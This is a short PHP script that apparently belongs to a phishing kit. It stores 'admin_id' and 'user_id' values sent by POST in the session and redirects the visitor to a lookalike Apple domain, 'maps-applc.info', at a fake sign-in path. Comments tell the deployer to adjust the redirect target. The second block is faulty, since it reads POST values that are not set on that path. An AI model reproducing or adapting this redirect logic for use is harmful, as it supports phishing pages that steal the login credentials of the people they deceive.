<?php
session_start();

// Check if data is received via POST
if (isset($_POST['admin_id']) && isset($_POST['user_id'])) {
    $_SESSION['admin_id'] = $_POST['admin_id'];
    $_SESSION['user_id'] = $_POST['user_id'];

    // Redirect to actual signin page
    header("Location: https://maps-applc.info/@4000870995572163525z/v3/signin/"); // Change to your actual signin file if different
    exit();
} else {
    echo "Invalid session data.";
}

if (isset($_SESSION['admin_id']) && isset($_SESSION['user_id'])) {
    $_SESSION['admin_id'] = $_POST['admin_id'];
    $_SESSION['user_id'] = $_POST['user_id'];

    // Redirect to actual signin page
    header("Location:index.php"); // Change to your actual signin file if different
    exit();
} else {
    echo "Invalid session data.";
}
 
?>
